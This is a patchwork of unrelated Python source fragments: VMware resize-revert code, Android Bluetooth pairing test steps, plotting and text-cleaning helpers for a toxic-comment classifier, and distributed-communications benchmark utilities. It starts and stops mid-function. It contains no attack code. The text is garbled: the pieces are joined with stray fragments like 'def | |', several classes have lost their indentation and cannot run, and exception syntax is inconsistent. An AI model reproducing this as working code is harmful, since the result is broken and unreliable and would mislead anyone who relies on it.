                                             'original.vmdk')
        ds_browser = self._get_ds_browser(ds_ref)
        if ds_util.file_exists(self._session, ds_browser,
                               original_disk.parent,
                               original_disk.basename):
            ds_util.disk_delete(self._session, dc_info.ref,
                                str(original_disk))
    def _revert_migration_update_disks(self, vm_ref, instance, vmdk,
                                       block_device_info):
        """Swap the preserved original root disk back in and rebuild the
        ephemeral/swap disks when reverting a resize."""
        ds_ref = vmdk.device.backing.datastore
        dc_info = self.get_datacenter_ref_and_name(ds_ref)
        folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
        datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
        original_disk = ds_obj.DatastorePath(datastore, folder,
                                             'original.vmdk')
        ds_browser = self._get_ds_browser(ds_ref)
        if ds_util.file_exists(self._session, ds_browser,
                               original_disk.parent,
                               original_disk.basename):
            # replace the resized disk with the preserved original
            self._volumeops.detach_disk_from_vm(vm_ref, instance,
                                                vmdk.device)
            ds_util.disk_delete(self._session, dc_info.ref, vmdk.path)
            ds_util.disk_move(self._session, dc_info.ref,
                              str(original_disk), vmdk.path)
            self._volumeops.attach_disk_to_vm(vm_ref, instance,
                                              vmdk.adapter_type,
                                              vmdk.disk_type, vmdk.path)
        # Reconfigure ephemerals
        self._remove_ephemerals_and_swap(vm_ref)
        self._resize_create_ephemerals_and_swap(vm_ref, instance,
                                                block_device_info)
    def finish_revert_migration(self, context, instance, network_info,
                                block_device_info, power_on=True):
        """Finish reverting a resize."""
        vm_ref = vm_util.get_vm_ref(self._session, instance)
        # Ensure that the VM is off
        vm_util.power_off_instance(self._session, instance, vm_ref)
        client_factory = self._session.vim.client.factory
        # Reconfigure the VM properties back to the original flavor values.
        extra_specs = self._get_extra_specs(instance.flavor,
                                            instance.image_meta)
        metadata = self._get_instance_metadata(context, instance)
        vm_resize_spec = vm_util.get_vm_resize_spec(
            client_factory,
            int(instance.flavor.vcpus),
            int(instance.flavor.memory_mb),
            extra_specs,
            metadata=metadata)
        vm_util.reconfigure_vm(self._session, vm_ref, vm_resize_spec)

        vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
                                     uuid=instance.uuid)
        if vmdk.device:
            self._revert_migration_update_disks(vm_ref, instance, vmdk,
                                                block_device_info)

        # Relocate the instance back, if needed
        if instance.uuid not in self.list_instances():
            # Get the root disk vmdk object's adapter type
            adapter_type = vmdk.adapter_type
            # Volumes must be detached for the relocation and re-attached
            # afterwards regardless of whether the relocation succeeded.
            self._detach_volumes(instance, block_device_info)
            LOG.debug("Relocating VM for reverting migration",
                      instance=instance)
            try:
                self._relocate_vm(vm_ref, context, instance, network_info)
                LOG.debug("Relocated VM for reverting migration",
                          instance=instance)
            except Exception as e:
                with excutils.save_and_reraise_exception():
                    LOG.error("Relocating the VM failed: %s", e,
                              instance=instance)
            else:
                self.update_cluster_placement(context, instance)
            finally:
                self._attach_volumes(instance, block_device_info, adapter_type)

        if power_on:
            vm_util.power_on_instance(self._session, instance)
def | |
a pair request. It searches for the device name, clicks on it and assures
that the initiator device is in the pairing request window (i.e. if pair request window
is not displayed on the screen, it checks if the "Cannot communicate" message is displayed,
and checks device name paired or not to DUT, If paired returns true)
Usage:
bluetooth_steps.PairDevice(serial=serial, dev_to_pair_name="Name",
scan_timeout=60000, scan_max_attempts=1, version=version)()
"""
    def __init__(self, dev_to_pair_name, scan_timeout=60000, scan_max_attempts=1, **kwargs):
        """
        :param dev_to_pair_name: name of device to pair with
        :param scan_timeout: maximum timeout for scanning progress
        :param scan_max_attempts: maximum no. of scan tries till the device is found
        :param kwargs: serial, version, timeout, no_log and standard kwargs for base_step
        """
        BtStep.__init__(self, **kwargs)
        self.dev_to_pair_name = dev_to_pair_name
        self.scan_timeout = scan_timeout
        self.scan_max_attempts = scan_max_attempts
        # assume success until do() reports otherwise
        self.step_data = True
        self.set_passm("Paired with " + str(dev_to_pair_name))
    def do(self):
        """Scan for the device, click it and ensure the pairing dialog opens."""
        try:
            # search for required device
            if not BtSearchDevices(serial=self.serial, dev_to_find=self.dev_to_pair_name,
                                   scan_timeout=self.scan_timeout,
                                   timeout=self.timeout, max_attempts=self.scan_max_attempts, version=self.version,
                                   critical=False)():
                raise Exception("Search for device failed")
            # click on the device name (already scrolled in the view)
            self.uidevice(text=self.dev_to_pair_name).click()
            if self.version.startswith("5."):
                # LLP version
                # if pair request window not appear on the device, open notification and check
                # if there is not even there the pairing request
                if not self.uidevice(resourceId="android:id/alertTitle",
                                     text="Bluetooth pairing request").wait.exists(timeout=5000):
                    if self.uidevice(textContains="Can't communicate with").exists:
                        raise Exception(
                            "Pair request not initiated from DUT because can't communicate with other one device")
            else:
                # M, N version
                # if pair request window not appear on the device, open notification and check
                # if there is not even there the pairing request
                pair_request_title_obj = self.uidevice(resourceId="android:id/alertTitle", textContains="Pair with")
                if not pair_request_title_obj.wait.exists(timeout=5000):
                    if self.uidevice(textContains="Can't communicate with").exists:
                        raise Exception(
                            "Pair request not initiated from DUT because can't communicate with other one device")
        except Exception, e:
            self.set_errorm("Pair request to " + str(self.dev_to_pair_name), e.message)
            self.step_data = False
    def check_condition(self):
        """
        :return: True if Device was paired, False if not
        """
        # only verify the paired state when do() succeeded
        if self.step_data:
            # check if is paired with required device
            self.step_data = CheckIfPaired(serial=self.serial, dev_paired_with=self.dev_to_pair_name, paired=True,
                                           timeout=self.timeout, version=self.version, critical=False)()
        return self.step_data
class ReceivePairRequest(BtStep):
""" Description:
Receives a pair request. It assures that device is
in the pairing request window (i.e. if pair request window
is not received on the screen, it searches it in the
notifications menu)
Usage:
bluetooth_steps.ReceivePairRequest(serial=serial,
dev_receiving_from_name="Name", version=version)()
"""
def __init__(self, dev_receiving_from_name, **kwargs):
"""
:param dev_receiving_from_name: name of the device receiving pair request from
:param kwargs: serial, version, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.dev_receiving_from_name = dev_receiving_from_name
self.step_data = True
self.set_passm("Pair request received from " + str(self.dev_receiving_from_name))
def do(self):
try:
if self.version.startswith("5."):
# LLP version
# if pair request window not appear on the receiver device, open notification and check if
# there is not even there the pairing request
if not self.uidevice(resourceId="android:id/alertTitle", text="Bluetooth pairing request").wait.exists(
timeout=5000):
if not SearchPairRequestNotification(serial=self.serial, timeout=self.timeout, version=self.version,
critical=False)():
raise Exception(
"Pair request not received on the screen, also failed" +
" searching it in notifications menu")
if not WaitPairRequest(serial=self.serial, appear=True, time_to_wait=self.timeout,
version=self.version, critical=False)():
raise Exception("Pair request not received")
if not self.uidevice(resourceId="com.android.settings:id/message_subhead",
text=self.dev_receiving_from_name).wait.exists(timeout=self.timeout):
raise Exception("Pair request not received from the expected device")
else:
# M, N version
# if pair request window not appear on the receiver device, open notification and check if
# there is not even there the pairing request
pair_request_title_obj = self.uidevice(resourceId="android:id/alertTitle", textContains="Pair with")
if not pair_request_title_obj.wait.exists(timeout=5000):
if not SearchPairRequestNotification(serial=self.serial, timeout=self.timeout, version=self.version,
critical=False, no_log=True)():
raise Exception(
"Pair request not received on the screen, also failed" +
" searching it in notifications menu")
if not WaitPairRequest(serial=self.serial, appear=True, time_to_wait=self.timeout,
verion=self.version, critical=False, no_log=True)():
raise Exception("Pair request not received on device")
pair_request_title_str = pair_request_title_obj.text
if not pair_request_title_str == "Pair with " + str(self.dev_receiving_from_name) + "?":
raise Exception(
"Pair request not received from the expected device, found " + str(pair_request_title_str))
except Exception, e:
self.set_errorm("Pair request from " + str(self.dev_receiving_from_name), e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if Both devices are in the pair request window, False otherwise
"""
return self.step_data
class SearchPairRequestNotification(BtStep):
    """ Description:
            Opens a Pairing request from the notification menu. Note that
            this does not check if, indeed the pairing request dialog appears,
            it only clicks the notification. Call this only if the request
            dialog is not displayed and it should be
        Usage:
            bluetooth_steps.SearchPairRequestNotification(serial=serial)()
    """

    def __init__(self, **kwargs):
        """
        :param kwargs: serial, no_log and standard kwargs for base_step
        """
        BtStep.__init__(self, **kwargs)
        # assume success until do() reports otherwise
        self.step_data = True
        self.set_passm("Pairing request notification clicked")

    def do(self):
        try:
            # open notification menu
            if not OpenNotificationsMenu(serial=self.serial, timeout=self.timeout, version=self.version, critical=False,
                                         no_log=True)():
                raise Exception("Notification menu not opened when searching for pairing request")
            # click on the pairing request notification
            if not BtCheckNotificationAppear(serial=self.serial, text_contains="Pairing request",
                                             click_on_notification=True, time_to_appear=self.timeout,
                                             version=self.version, critical=False, no_log=True)():
                raise Exception("Check Pair request notification not successful")
        except Exception, e:
            self.set_errorm("Search pair request in notifications ", e.message)
            self.step_data = False

    def check_condition(self):
        """
        :return: True if Pair request notification was found and clicked, False otherwise
        """
        return self.step_data
class OpenNotificationsMenu(BtStep):
    """ Description:
            Opens the notifications menu in order to operate with Bluetooth notifications
        Usage:
            bluetooth_steps.OpenNotificationsMenu(serial=serial)()
    """

    def __init__(self, **kwargs):
        """
        :param kwargs: serial, timeout, no_log and standard kwargs for base_step
        """
        BtStep.__init__(self, **kwargs)
        self.set_passm("Notifications menu opened")
        self.set_errorm("Open notifications", "Notifications menu not opened")

    def do(self):
        # swipe the status bar down, then give the transition time to finish
        self.uidevice.open.notification()
        time.sleep(2)

    def check_condition(self):
        """
        :return: True if Notifications menu was opened, False otherwise
        """
        scroller = self.uidevice(resourceId="com.android.systemui:id/notification_stack_scroller")
        self.step_data = scroller.wait.exists(timeout=self.timeout)
        return self.step_data
class CloseNotificationsMenu(BtStep):
    """ Description:
            Closes the notifications menu
        Usage:
            bluetooth_steps.CloseNotificationsMenu(serial=serial)()
    """

    def __init__(self, **kwargs):
        """
        :param kwargs: serial, timeout, no_log and standard kwargs for base_step
        """
        BtStep.__init__(self, **kwargs)
        self.step_data = True
        self.notifications_menu = self.uidevice(resourceId="com.android.systemui:id/notification_stack_scroller")
        self.set_passm("Notifications menu closed")
        self.set_errorm("Close notifications", "Notifications menu not gone")

    def do(self):
        try:
            if not self.notifications_menu.exists:
                raise Exception("Notifications menu is not already opened")
            self.uidevice.press.back()
        except Exception as e:
            # fix: 'except Exception, e' is Python-2-only syntax and
            # 'e.message' was removed in Python 3; 'as e' + str(e) behave
            # identically on Python 2.6+ and also work on Python 3
            self.set_errorm("Close notifications", str(e))
            self.step_data = False

    def check_condition(self):
        """
        :return: True if Notifications menu was closed, False otherwise
        """
        if self.step_data:
            self.step_data = self.notifications_menu.wait.gone(timeout=self.timeout)
        return self.step_data
class PerformActionPairRequest(BtStep):
    """ Description:
            Performs a click on the button with label exact text as defined by
            action parameter and checks if the pair request window is gone. If
            the action is 'Timeout', it only waits for pair request window to be
            gone, the amount of time as defined by timeout parameter. Call this
            only when Pair request window is already shown
        Usage:
            bluetooth_steps.PerformActionPairRequest(serial=serial,
                            action="Pair", version=version)()
    """

    def __init__(self, action="Pair", **kwargs):
        """
        :param action: "Pair"/"Cancel"/"Timeout" action to be performed
        :param kwargs: serial, timeout, version, no_log, and standard kwargs for base_step
        """
        BtStep.__init__(self, **kwargs)
        if action not in ["Cancel", "Pair", "Timeout"]:
            raise Exception("Config error: not any expected value for action")
        if self.version.startswith("5.") or self.version.startswith("6.0"):
            # LLP, M versions use mixed-case button labels
            self.action = action
        else:
            # N version uses upper-case button labels
            self.action = action.upper()
        self.step_data = True
        self.set_passm("Action " + str(self.action) + " successful")
        self.set_errorm("Action " + str(self.action), "Pair request window not gone after action performed")

    def do(self):
        try:
            # if action is not Timeout, perform click on the button
            if self.action.upper() != "TIMEOUT":
                action_button = self.uidevice(text=self.action)
                if not action_button.wait.exists(timeout=self.timeout + 30000):
                    raise Exception("Button " + str(self.action) + " not found")
                action_button.click()
                # some devices show an extra confirmation popup with a YES button
                if self.uidevice(text="YES").wait.exists(timeout=1000):
                    self.uidevice(text="YES").click()
        except Exception as e:
            # fix: 'except Exception, e' is Python-2-only syntax and
            # 'e.message' was removed in Python 3; 'as e' + str(e) behave
            # identically on Python 2.6+ and also work on Python 3
            self.set_errorm("Action " + str(self.action), str(e))
            self.step_data = False

    def check_condition(self):
        """
        :return: True if pair request window is gone, False if not
        """
        if self.step_data:
            # check if the pair request window is gone
            self.step_data = WaitPairRequest(serial=self.serial, appear=False, time_to_wait=self.timeout,
                                             version=self.version, critical=False)()
        return self.step_data
class CouldNotPairDialogCheck(BtStep):
""" Description:
Checks if the "Couldn't pair" dialog is displayed
(by waiting for it) and clicks on it's OK button.
Usage:
bluetooth_steps.CouldNotPairDialogCheck(serial=serial)()
"""
def __init__(self, **kwargs):
"""
:param kwargs: serial, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.step_data = True
self.set_passm("Dialog appeared, canceled successful")
self.set_errorm("Could not pair dialog", "Not canceled successfully")
self.dialog_window = self.uidevice(resourceId="android:id/message", textContains="incorrect PIN or passkey")
def do(self):
try:
if self.device_info.dessert < "O":
# wait for dialog to appear
if not self.dialog_window.wait.exists(timeout=self.timeout + 30000):
raise Exception("Dialog not appeared")
# click on it's OK button
ok_button = self.uidevice(text="OK")
if not ok_button.wait.exists(timeout=self.timeout + 30000):
raise Exception("OK not found in the dialog")
ok_button.click()
else:
pass
# --- Repository: zequeira/Toxic-Comment-Classification ---
import re
import string
import itertools
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from wordcloud import WordCloud, STOPWORDS
from wordsegment import load, segment
load()
plt.style.use("seaborn-pastel")
def category_percentage(df):
    """Bar-plot the percentage of records falling into each toxicity category.

    Side effect: adds a 'clean' indicator column to df — a row is clean when
    all six toxicity labels are zero.
    """
    label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
    df['clean'] = np.where((df[label_cols] == 0).all(axis=1), 1, 0)
    categories = label_cols + ['clean']
    plot_data = df[categories].mean() * 100
    plt.figure(figsize=(10, 5))
    plt.title("percentage records by category")
    sns.barplot(x=plot_data.index, y=plot_data.values)
    plt.show()
    return
def label_count(df):
    """Plot absolute comment counts per category, in two views.

    Assumes label columns sit at positions 2:8 and a 'clean' column already
    exists (see category_percentage) — TODO confirm against callers.
    """
    label_columns = df.columns.tolist()[2:8]
    categories = ['toxic', 'severe_toxic', 'obscene', 'threat',
                  'insult', 'identity_hate', 'clean']
    totals = df[categories].sum()
    plt.figure(figsize=(10, 5))
    plt.title("Number of comments per category")
    sns.barplot(x=totals.index, y=totals.values)
    plt.show()
    # second view: horizontal bars sorted ascending, plus a console dump
    sorted_counts = df[label_columns].sum().sort_values()
    plt.figure(figsize=(10, 5))
    sorted_counts.plot(kind='barh')
    print(sorted_counts)
    plt.show()
    return
def text_length_across_classes(df):
    """Plot per-category text-length statistics (median/min/max word count and
    max distinct-token count), for the six toxicity labels plus 'clean'.

    Side effects: adds 'comment_length' and 'distinct_tokens' columns to df.

    Fixes: the original re-assigned the whole 'distinct_tokens' column on
    every loop iteration (6x the work) and re-built the six-way 'clean' mask
    five separate times; both are hoisted here with identical results.
    """
    labels = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
    df['comment_length'] = df['comment_text'].apply(lambda x: len(x.split()))
    # hoisted: compute once instead of once per label
    df['distinct_tokens'] = df['comment_text'].apply(lambda x: len(set(x.split())))
    median_text_len = []
    mean_text_len = []
    min_text_len = []
    max_text_len = []
    max_distinct_tokens = []
    for label in labels:
        subset = df[df[label] == 1]
        mean_text_len.append(subset['comment_length'].mean())
        min_text_len.append(subset['comment_length'].min())
        max_text_len.append(subset['comment_length'].max())
        median_text_len.append(subset['comment_length'].median())
        max_distinct_tokens.append(subset['distinct_tokens'].max())
    # hoisted: rows belonging to none of the toxic labels ("clean")
    clean_subset = df[(df[labels] == 0).all(axis=1)]
    mean_text_len.append(clean_subset['comment_length'].mean())
    min_text_len.append(clean_subset['comment_length'].min())
    max_text_len.append(clean_subset['comment_length'].max())
    median_text_len.append(clean_subset['comment_length'].median())
    max_distinct_tokens.append(clean_subset['distinct_tokens'].max())
    categories = labels + ['clean']
    fig, axes = plt.subplots(2, 2, figsize=(18, 10))
    sns.barplot(ax=axes[0, 0], x=categories, y=median_text_len)
    axes[0, 0].set_title('median text length')
    sns.barplot(ax=axes[0, 1], x=categories, y=min_text_len)
    axes[0, 1].set_title('minimum text length')
    sns.barplot(ax=axes[1, 0], x=categories, y=max_text_len)
    axes[1, 0].set_title('max text length')
    sns.barplot(ax=axes[1, 1], x=categories, y=max_distinct_tokens)
    axes[1, 1].set_title('max distinct tokens')
    fig.suptitle('text length statistics')
    plt.show()
    return
def corr_between_labels(df):
    """Render a heatmap of pairwise correlations between the numeric columns.

    Uses DataFrame.corr() directly, so every numeric column present in df
    participates, not only the label columns.
    """
    plt.figure(figsize=(15, 8))
    plt.title("correlation between toxic categories")
    sns.heatmap(df.corr(), cmap='YlGnBu', annot=True)
    plt.show()
    return
## Gram statistics
def gram_analysis(data, gram):
    """Return the n-grams of *data* as space-joined strings.

    Lowercases, splits on single spaces, drops empty tokens and English
    stopwords, then slides a window of size *gram* over what remains.
    """
    stop_words_set = set(stopwords.words('english'))
    tokens = [tok for tok in data.lower().split(" ")
              if tok != "" and tok not in stop_words_set]
    windows = zip(*[tokens[offset:] for offset in range(gram)])
    return [" ".join(window) for window in windows]
def gram_freq(df, gram, categ_col, text_col):
    """Plot the 30 most frequent n-grams for a 200-comment sample of a category.

    :param df: comments DataFrame
    :param gram: n-gram size passed to gram_analysis
    :param categ_col: label column selecting the category (value == 1)
    :param text_col: column holding the raw comment text

    Fix: the original referenced `pd` although pandas is never imported in
    this module, so every call raised NameError; import it locally here.
    """
    import pandas as pd  # no top-level pandas import exists in this module

    category_text = " ".join(df[df[categ_col] == 1][text_col].sample(200).values)
    toks = gram_analysis(category_text, gram)
    tok_freq = pd.DataFrame(data=[toks, np.ones(len(toks))]).T.groupby(0).sum().reset_index()
    tok_freq.columns = ['token', 'frequency']
    tok_freq = tok_freq.sort_values(by='frequency', ascending=False)
    plt.figure(figsize=(10, 8))
    plt.title("{} most common tokens".format(categ_col))
    sns.barplot(x='token', y='frequency', data=tok_freq.iloc[:30])
    plt.xticks(rotation=90)
    plt.show()
    return
def avg_word_len_plot(df):
    """Plot the distribution of per-comment average word length for clean
    comments and for toxic comments (all forms).

    Side effects: adds 'punct_count' and 'avg_word_length' columns to df.
    Requires an existing 'clean' column (see category_percentage).
    """
    df['punct_count'] = df['comment_text'].apply(
        lambda x: len([a for a in x if a in string.punctuation]))
    df['avg_word_length'] = df['comment_text'].apply(
        lambda x: np.round(np.mean([len(a) for a in x.split()])))
    # same plotting sequence for both populations; only the selector,
    # console label and figure title differ
    for flag, label, title in (
        (1, "clean", "Average word length - clean comments"),
        (0, "toxic", "Average word length -toxic comments (all forms)"),
    ):
        counts = df[df['clean'] == flag].avg_word_length.value_counts().reset_index()
        counts.columns = ['length', 'frequency']
        print("{} comments max token length : {}".format(label, max(counts.length)))
        counts = counts.sort_values(by='length')
        plt.figure(figsize=(20, 7))
        plt.title(title)
        sns.barplot(x=counts.length, y=counts.frequency)
        plt.xticks(rotation=90)
        plt.show()
    return
def generate_wordclouds(df, text_col, categ_col):
    """Render a word cloud for one toxicity category.

    :param categ_col: label column, or the special value 'all_toxic' to pool
        every non-clean comment
    Side effect: (re)computes the 'clean' indicator column on df.
    """
    label_cols = ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']
    df['clean'] = np.where((df[label_cols] == 0).all(axis=1), 1, 0)
    if categ_col == 'all_toxic':
        category_text = df[df['clean'] != 1][text_col].values
    else:
        category_text = df[df[categ_col] == 1][text_col].values
    plt.figure(figsize=(15, 8))
    cloud = WordCloud(background_color="black",
                      max_words=5000,
                      stopwords=STOPWORDS,
                      collocations=False,
                      max_font_size=40)
    cloud.generate(" ".join(category_text))
    plt.title("{} word cloud".format(categ_col), fontsize=20)
    plt.imshow(cloud.recolor(colormap='Pastel2', random_state=17), alpha=0.98)
    plt.axis('off')
    plt.show()
    return
# def venn_(df):
# figure, axes = plt.subplots(2, 2, figsize=(20, 20))
# toxic = set(df[df['toxic'] == 1].index)
# severe_toxic = set(df[df['severe_toxic'] == 1].index)
# obscene = set(df[df['obscene'] == 1].index)
# threat = set(df[df['threat'] == 1].index)
# insult = set(df[df['insult'] == 1].index)
# identity_hate = set(df[df['identity_hate'] == 1].index)
# clean = set(df[df['clean'] == 1].index)
#
# v1 = venn3([toxic, severe_toxic, obscene],
# set_labels=('Toxic', 'Severe toxic', 'Obscene'), set_colors=('#a5e6ff', '#3c8492', '#9D8189'),
# ax=axes[0][0])
# for text in v1.set_labels:
# text.set_fontsize(22)
# v2 = venn3([threat, insult, identity_hate],
# set_labels=('Threat', 'Insult', 'Identity hate'), set_colors=('#e196ce', '#F29CB7', '#3c81a9'),
# ax=axes[0][1])
# for text in v2.set_labels:
# text.set_fontsize(22)
# v3 = venn3([toxic, insult, obscene],
# set_labels=('Toxic', 'Insult', 'Obscene'), set_colors=('#a5e6ff', '#F29CB7', '#9D8189'), ax=axes[1][0])
# for text in v3.set_labels:
# text.set_fontsize(22)
# v4 = venn3([threat, identity_hate, obscene],
# set_labels=('Threat', 'Identity hate', 'Obscene'), set_colors=('#e196ce', '#3c81a9', '#9D8189'),
# ax=axes[1][1])
# for text in v4.set_labels:
# text.set_fontsize(22)
# plt.show()
#
# # deleting used variables
# del toxic
# del severe_toxic
# del obscene
# del threat
# del insult
# del identity_hate
# del clean
# return
def meta_data_analysis(df, text_col):
    """Build a DataFrame of surface-level metadata for each comment:
    punctuation/hashtag/username/stopword/upper-case/url/word counts.

    Requires df to already carry a 'clean' column (see category_percentage).

    Fix: the original referenced `pd` although pandas is never imported in
    this module, so every call raised NameError; import it locally here.
    """
    import pandas as pd  # no top-level pandas import exists in this module

    meta_df = pd.DataFrame()
    meta_df['punctuations'] = df[text_col].apply(lambda x: len([a for a in str(x) if a in string.punctuation]))
    meta_df['hashtags'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith("#")]))
    meta_df['usernames'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith("@")]))
    meta_df['stop_words'] = df[text_col].apply(lambda x: len([a for a in x.lower().split() if a in STOPWORDS]))
    meta_df['upper_case_words'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.isupper()]))
    meta_df['urls'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith(tuple(['http', 'www']))]))
    meta_df['word_count'] = df[text_col].apply(lambda x: len(x.split()))
    meta_df['distinct_word_count'] = df[text_col].apply(lambda x: len(set(x.split())))
    meta_df['clean'] = df['clean'].copy()
    return meta_df
## Text cleaning
class TextCleaningUtils:
'''
This class contains implementations of various text cleaning operations (Static Methods)
'''
@staticmethod
def expand_abbreviations(text):
text = re.sub(r"he's", "he is", text)
text = re.sub(r"there's", "there is", text)
text = re.sub(r"We're", "We are", text)
text = re.sub(r"That's", "That is", text)
text = re.sub(r"won't", "will not", text)
text = re.sub(r"they're", "they are", text)
text = re.sub(r"Can't", "Cannot", text)
text = re.sub(r"wasn't", "was not", text)
text = re.sub(r"don\x89Ûªt", "do not", text)
text = re.sub(r"aren't", "are not", text)
text = re.sub(r"isn't", "is not", text)
text = re.sub(r"What's", "What is", text)
text = re.sub(r"haven't", "have not", text)
text = re.sub(r"hasn't", "has not", text)
text = re.sub(r"There's", "There is", text)
text = re.sub(r"He's", "He is", text)
text = re.sub(r"It's", "It is", text)
text = re.sub(r"You're", "You are", text)
text = re.sub(r"I'M", "I am", text)
text = re.sub(r"shouldn't", "should not", text)
text = re.sub(r"wouldn't", "would not", text)
text = re.sub(r"couldn't", "could not", text)
text = re.sub(r"i'm", "I am", text)
text = re.sub(r"I\x89Ûªm", "I am", text)
text = re.sub(r"I'm", "I am", text)
text = re.sub(r"Isn't", "is not", text)
text = re.sub(r"Here's", "Here is", text)
text = re.sub(r"you've", "you have", text)
text = re.sub(r"you\x89Ûªve", "you have", text)
text = re.sub(r"we're", "we are", text)
text = re.sub(r"what's", "what is", text)
text = re.sub(r"couldn't", "could not", text)
text = re.sub(r"we've", "we have", text)
text = re.sub(r"it\x89Ûªs", "it is", text)
text = re.sub(r"doesn\x89Ûªt", "does not", text)
text = re.sub(r"It\x89Ûªs", "It is", text)
text = re.sub(r"Here\x89Ûªs", "Here is", text)
text = re.sub(r"who's", "who is", text)
text = re.sub(r"I\x89Ûªve", "I have", text)
text = re.sub(r"y'all", "you all", text)
text = re.sub(r"can\x89Ûªt", "cannot", text)
text = re.sub(r"would've", "would have", text)
text = re.sub(r"it'll", "it will", text)
text = re.sub(r"we'll", "we will", text)
text = re.sub(r"wouldn\x89Ûªt", "would not", text)
text = re.sub(r"We've", "We have", text)
text = re.sub(r"he'll", "he will", text)
text = re.sub(r"Y'all", "You all", text)
text = re.sub(r"Weren't", "Were not", text)
text = re.sub(r"Didn't", "Did not", text)
text = re.sub(r"they'll", "they will", text)
text = re.sub(r"DON'T", "DO NOT", text)
text = re.sub(r"That\x89Ûªs", "That is", text)
text = re.sub(r"they've", "they have", text)
text = re.sub(r"they'd", "they would", text)
text = re.sub(r"i'd", "I would", text)
text = re.sub(r"should've", "should have", text)
text = re.sub(r"You\x89Ûªre", "You are", text)
text = re.sub(r"where's", "where is", text)
text = re.sub(r"Don\x89Ûªt", "Do not", text)
text = re.sub(r"i'll", "I will", text)
text = re.sub(r"weren't", "were not", text)
text = re.sub(r"They're", "They are", text)
text = re.sub(r"Can\x89Ûªt", "Cannot", text)
text = re.sub(r"you\x89Ûªll", "you will", text)
text = re.sub(r"I\x89Ûªd", "I would", text)
text = re.sub(r"let's", "let us", text)
text = re.sub(r"it's", "it is", text)
text = re.sub(r"can't", "cannot", text)
text = re.sub(r"don't", "do not", text)
text = re.sub(r"you're", "you are", text)
text = re.sub(r"i've", "I have", text)
text | |
# gh_stars: 0
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import random
import sys
import time
from abc import ABC, abstractmethod
from collections import OrderedDict
from dataclasses import dataclass
from io import StringIO
import torch
from torch.autograd.profiler import record_function
random.seed()
logger = logging.getLogger(__name__)
default_master_ip = "127.0.0.1"
default_master_port = "29500"
def gracefulExit(args=0):
    """Terminate the process, logging *args* first when it signals an error.

    :param args: exit status (or message object); anything other than 0 is
        logged via logger.error before being handed to sys.exit
    """
    # TODO: Is this the best way to exit?
    if args != 0:
        logger.error(args)
    # WARNING: Assuming sys is always used, should find a platform-independent way to gracefully exit.
    sys.exit(args)
def parsesize(ipValue):
    """nccl-tests compatible input-size parsing.

    Accepts "<n>G", "<n>M", "<n>K" or a plain integer string and returns the
    size in bytes as an int. Unparsable input is logged and the process exits
    via gracefulExit().
    """
    # suffixes checked in the same precedence order as the original: G, M, K
    for suffix, multiplier in (("G", 1024 * 1024 * 1024),
                               ("M", 1024 * 1024),
                               ("K", 1024)):
        unitIdx = ipValue.find(suffix)
        if unitIdx != -1:
            return int(ipValue[0:unitIdx]) * multiplier
    if ipValue.isnumeric():
        return int(ipValue)
    logger.error(f"Could not parse input size {ipValue}")
    gracefulExit()
def parseRankList(ipStr, ipName, comms_world_info):
    """Parse a rank specification into a list of ranks.

    Supported forms: single rank ("3"), comma list ("0,2,2,4" — duplicates
    removed, first-seen order kept) and inclusive range ("2:5"). An empty
    string yields []. Invalid or out-of-range input is logged on global rank 0
    and terminates via gracefulExit().
    """
    rankList = []
    if ipStr:
        if ipStr.isnumeric():
            # single rank
            rankList = [int(ipStr)]
        elif ipStr.find(",") != -1:
            # comma-separated ranks; OrderedDict.fromkeys dedups, keeps order
            rankList = list(OrderedDict.fromkeys(int(r.strip()) for r in ipStr.split(",")))
        elif ipStr.find(":") != -1:
            # "[start:end]" inclusive range
            bounds = [int(r.strip()) for r in ipStr.split(":")]
            rankList = [*range(bounds[0], bounds[1] + 1)]
        # reject empty parses and ranks outside [0, world_size)
        bad = len(rankList) == 0 or any(
            r < 0 or r >= comms_world_info.world_size for r in rankList
        )
        if bad:
            if comms_world_info.global_rank == 0:
                logger.error(f"Could not parse {ipName}: {ipStr}")
            gracefulExit()
    return rankList
def getAlgBW(elapsedTimeNS, dataSize, numIters):
    """Compute per-iteration latency and algorithmic bandwidth, nccl-tests style.

    :return: (average ns per iteration, dataSize / avg-ns); both components
        fall back to 0.0 when their divisor is zero
    """
    avgIterNS = elapsedTimeNS / numIters if numIters != 0 else 0.0
    algBW = dataSize / avgIterNS if avgIterNS != 0 else 0.0  # bytes/ns == GB/s
    return (avgIterNS, algBW)
def getSizes(beginSize, endSize, stepFactor):
    """Return the geometric series of message sizes from beginSize to endSize.

    Each step multiplies by stepFactor; a safety cap of maxIters iterations
    bounds the loop (important when stepFactor <= 1 would never terminate).

    Fix: the loop guard compared against a hard-coded 100 instead of the
    maxIters variable defined right above it; same value today, but the two
    could silently diverge — the variable is now used.
    """
    curSize = beginSize
    numIters = 0
    maxIters = 100
    allSizes = []
    while curSize <= endSize:
        allSizes.append(curSize)
        curSize = curSize * stepFactor
        numIters = numIters + 1
        if numIters > maxIters:
            logger.error(
                f"For finding allSizes numIters: {numIters} is greater than maxIters: {maxIters}"
            )
            break
    return allSizes
def fixBeginSize(commsParams, world_size):
    """Bump commsParams.beginSize in place so every rank receives data.

    all_to_all(v): beginSize must cover world_size elements; additionally,
    with quantization (bitwidth < 32) at least quant_a2a_embedding_dim
    elements per rank. (all_)reduce: beginSize must hold one element.
    """
    collective = commsParams.collective
    elem_size = commsParams.element_size
    if collective in ("all_to_all", "all_to_allv"):
        if (commsParams.beginSize / elem_size) < world_size:
            commsParams.beginSize = world_size * elem_size
        if (
            commsParams.bitwidth < 32
